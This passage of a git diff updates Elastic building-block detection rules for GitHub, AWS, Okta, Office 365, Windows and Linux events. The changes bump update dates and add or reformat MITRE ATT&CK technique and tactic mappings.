Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["github.hashed_token", "event.action"] diff --git a/rules_building_block/execution_github_new_repo_interaction_for_pat.toml b/rules_building_block/execution_github_new_repo_interaction_for_pat.toml index cb75d586d8b..a8e01f3fedc 100644 --- a/rules_building_block/execution_github_new_repo_interaction_for_pat.toml +++ b/rules_building_block/execution_github_new_repo_interaction_for_pat.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -38,17 +38,34 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["github.hashed_token", "github.repo"] diff --git a/rules_building_block/execution_github_new_repo_interaction_for_user.toml b/rules_building_block/execution_github_new_repo_interaction_for_user.toml index ba867350a28..896a0dcf8b3 100644 --- a/rules_building_block/execution_github_new_repo_interaction_for_user.toml +++ b/rules_building_block/execution_github_new_repo_interaction_for_user.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -37,17 +37,34 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[[rule.threat.technique.subtechnique]] +id = "T1213.003" +name = "Code Repositories" +reference = "https://attack.mitre.org/techniques/T1213/003/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.new_terms] field = "new_terms_fields" value = ["user.name", "github.repo"] diff --git a/rules_building_block/execution_github_repo_created.toml b/rules_building_block/execution_github_repo_created.toml index 0b5f2635db1..a7e65405fa1 100644 --- a/rules_building_block/execution_github_repo_created.toml +++ b/rules_building_block/execution_github_repo_created.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -35,14 +35,31 @@ configuration where event.dataset == "github.audit" and event.action == "repo.cr [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1583" +name = "Acquire Infrastructure" +reference = "https://attack.mitre.org/techniques/T1583/" + +[[rule.threat.technique.subtechnique]] +id = "T1583.006" +name = "Web Services" +reference = "https://attack.mitre.org/techniques/T1583/006/" + +[rule.threat.tactic] +id = "TA0042" +name = "Resource Development" +reference = "https://attack.mitre.org/tactics/TA0042/" diff --git a/rules_building_block/execution_github_repo_interaction_from_new_ip.toml b/rules_building_block/execution_github_repo_interaction_from_new_ip.toml index 33a822c8378..c048fbf59d9 100644 --- a/rules_building_block/execution_github_repo_interaction_from_new_ip.toml +++ b/rules_building_block/execution_github_repo_interaction_from_new_ip.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -37,17 +37,52 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[[rule.threat.technique.subtechnique]] +id = "T1213.003" +name = "Code Repositories" +reference = "https://attack.mitre.org/techniques/T1213/003/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.new_terms] field = "new_terms_fields" value = ["github.repo", "github.actor_ip"] diff --git a/rules_building_block/execution_linux_segfault.toml b/rules_building_block/execution_linux_segfault.toml index e1d006ca679..b62d4a8eb19 100644 --- a/rules_building_block/execution_linux_segfault.toml +++ b/rules_building_block/execution_linux_segfault.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/26" integration = ["system"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -58,8 +58,12 @@ host.os.type:linux and event.dataset:"system.syslog" and process.name:kernel and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/execution_settingcontent_ms_file_creation.toml b/rules_building_block/execution_settingcontent_ms_file_creation.toml index 1c014464624..b6b5b084656 100644 --- a/rules_building_block/execution_settingcontent_ms_file_creation.toml +++ b/rules_building_block/execution_settingcontent_ms_file_creation.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/24" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -46,36 +46,54 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules_building_block/execution_unsigned_service_executable.toml b/rules_building_block/execution_unsigned_service_executable.toml index 3a861c4ab50..46bb49f0048 100644 --- a/rules_building_block/execution_unsigned_service_executable.toml +++ b/rules_building_block/execution_unsigned_service_executable.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -42,39 +42,57 @@ not process.code_signature.status : (errorCode_endpoint* or "errorChaining") [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1569" name = "System Services" reference = "https://attack.mitre.org/techniques/T1569/" + [[rule.threat.technique.subtechnique]] id = "T1569.002" name = "Service Execution" reference = "https://attack.mitre.org/techniques/T1569/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" reference = "https://attack.mitre.org/techniques/T1036/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.executable", "user.id"] diff --git a/rules_building_block/initial_access_aws_signin_token_created.toml b/rules_building_block/initial_access_aws_signin_token_created.toml index 2b8d3f7be02..46967d3819e 100644 --- a/rules_building_block/initial_access_aws_signin_token_created.toml +++ b/rules_building_block/initial_access_aws_signin_token_created.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/10/09" integration = ["aws"] maturity = "production" -updated_date = "2025/10/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -52,22 +52,39 @@ event.dataset: "aws.cloudtrail" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/initial_access_github_new_ip_address_for_pat.toml b/rules_building_block/initial_access_github_new_ip_address_for_pat.toml index b441c6147ea..472759c3b15 100644 --- a/rules_building_block/initial_access_github_new_ip_address_for_pat.toml +++ b/rules_building_block/initial_access_github_new_ip_address_for_pat.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -37,22 +37,39 @@ github.programmatic_access_type:("OAuth access token" or "Fine-grained personal [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["github.hashed_token", "github.actor_ip"] diff --git a/rules_building_block/initial_access_github_new_user_agent_for_pat.toml b/rules_building_block/initial_access_github_new_user_agent_for_pat.toml index 8ec411ba6d9..a0eadada079 100644 --- a/rules_building_block/initial_access_github_new_user_agent_for_pat.toml +++ b/rules_building_block/initial_access_github_new_user_agent_for_pat.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -37,22 +37,39 @@ github.programmatic_access_type:("OAuth access token" or "Fine-grained personal [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["github.hashed_token", "github.user_agent"] diff --git a/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml b/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml index fc9e62e6053..f08ca02aa13 100644 --- a/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml +++ b/rules_building_block/initial_access_microsoft_defender_threat_intelligence_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/08/19" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -98,26 +98,46 @@ event.dataset: "o365.audit" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.001" +name = "Malicious Link" +reference = "https://attack.mitre.org/techniques/T1204/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/initial_access_microsoft_quarantine_hygiene_signal.toml b/rules_building_block/initial_access_microsoft_quarantine_hygiene_signal.toml index db599d22bf6..59d2b383cf2 100644 --- a/rules_building_block/initial_access_microsoft_quarantine_hygiene_signal.toml +++ b/rules_building_block/initial_access_microsoft_quarantine_hygiene_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -52,11 +52,21 @@ event.dataset:o365.audit and event.code:(Quarantine or HygieneEvent or MailSubmi [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" [rule.threat.tactic] id = "TA0001" diff --git a/rules_building_block/initial_access_new_okta_authentication_behavior.toml b/rules_building_block/initial_access_new_okta_authentication_behavior.toml index 3333bc42b4d..30cd77e12b3 100644 --- a/rules_building_block/initial_access_new_okta_authentication_behavior.toml +++ b/rules_building_block/initial_access_new_okta_authentication_behavior.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/11/07" integration = ["okta"] maturity = "production" -updated_date = "2026/01/08" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -76,8 +76,17 @@ event.dataset:okta.system and okta.debug_context.debug_data.risk_behaviors:* [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules_building_block/initial_access_okta_admin_console_login_failure.toml b/rules_building_block/initial_access_okta_admin_console_login_failure.toml index 38c577a2179..212cbbd12bf 100644 --- a/rules_building_block/initial_access_okta_admin_console_login_failure.toml +++ b/rules_building_block/initial_access_okta_admin_console_login_failure.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/03" integration = ["okta"] maturity = "production" -updated_date = "2026/02/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -81,26 +81,31 @@ event.dataset: "okta.system" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules_building_block/lateral_movement_posh_winrm_activity.toml b/rules_building_block/lateral_movement_posh_winrm_activity.toml index 444d49ece7f..7021ddb7aa3 100644 --- a/rules_building_block/lateral_movement_posh_winrm_activity.toml +++ b/rules_building_block/lateral_movement_posh_winrm_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/12" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,36 +83,41 @@ case_insensitive = true value = "?:\\\\ExchangeServer\\\\bin*" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.006" name = "Windows Remote Management" reference = "https://attack.mitre.org/techniques/T1021/006/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml b/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml index dbc9fce692a..880890a7609 100644 --- a/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml +++ b/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/25" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,31 +78,57 @@ process where event.type == "start" and host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1505" name = "Server Software Component" reference = "https://attack.mitre.org/techniques/T1505/" + [[rule.threat.technique.subtechnique]] id = "T1505.001" name = "SQL Stored Procedures" reference = "https://attack.mitre.org/techniques/T1505/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules_building_block/lateral_movement_wmic_remote.toml b/rules_building_block/lateral_movement_wmic_remote.toml index 75ac81fc7f1..aa4f14d918c 100644 --- a/rules_building_block/lateral_movement_wmic_remote.toml +++ b/rules_building_block/lateral_movement_wmic_remote.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/24" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -51,31 +51,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" + [[rule.threat.technique.subtechnique]] id = "T1021.006" name = "Windows Remote Management" reference = "https://attack.mitre.org/techniques/T1021/006/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml b/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml index f4aaaef461d..aa24f20264c 100644 --- a/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml +++ b/rules_building_block/persistence_aws_iam_login_profile_added_to_user.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/04/30" integration = ["aws"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -43,29 +43,33 @@ event.dataset: aws.cloudtrail and event.provider: "iam.amazonaws.com" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/persistence_github_new_pat_for_user.toml b/rules_building_block/persistence_github_new_pat_for_user.toml index a65b0128137..88157c22dc0 100644 --- a/rules_building_block/persistence_github_new_pat_for_user.toml +++ b/rules_building_block/persistence_github_new_pat_for_user.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -37,22 +37,39 @@ github.programmatic_access_type:("OAuth access token" or "Fine-grained personal [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["user.name", "github.hashed_token"] diff --git a/rules_building_block/persistence_github_new_user_added_to_organization.toml b/rules_building_block/persistence_github_new_user_added_to_organization.toml index ebf6de67223..fbad7c11ca5 100644 --- a/rules_building_block/persistence_github_new_user_added_to_organization.toml +++ b/rules_building_block/persistence_github_new_user_added_to_organization.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -35,19 +35,23 @@ configuration where event.dataset == "github.audit" and event.action == "org.add [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/persistence_iam_instance_request_to_iam_service.toml b/rules_building_block/persistence_iam_instance_request_to_iam_service.toml index e4a2ed6fd5e..06b0a02191a 100644 --- a/rules_building_block/persistence_iam_instance_request_to_iam_service.toml +++ b/rules_building_block/persistence_iam_instance_request_to_iam_service.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/07/24" integration = ["aws"] maturity = "production" -updated_date = "2024/11/07" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,20 +84,22 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" @@ -108,17 +110,7 @@ id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" 